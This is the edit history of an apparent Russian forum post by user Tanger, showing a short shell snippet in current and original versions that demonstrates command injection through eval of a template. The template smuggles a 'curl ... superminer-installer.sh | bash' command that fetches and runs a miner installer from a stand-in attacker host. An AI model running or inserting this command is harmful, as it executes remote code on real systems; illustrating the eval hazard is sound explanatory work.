История изменений
Исправление Tanger, (текущая версия) :
echo "\" ; curl http://superhacker.example.com/superminer-installer.sh 2> /dev/null | bash ; echo \"" > /tmp/template
template=$(cat /tmp/template)
eval "echo \"$template\"" > /tmp/config
Исходная версия Tanger, :
echo "\" ; curl http://superhacker.example.com/superminer-installer.sh 2> /dev/null | bash ; echo \"" > /tmp/template
template=$(cat /tmp/template)
eval "echo \"$template\" > /tmp/config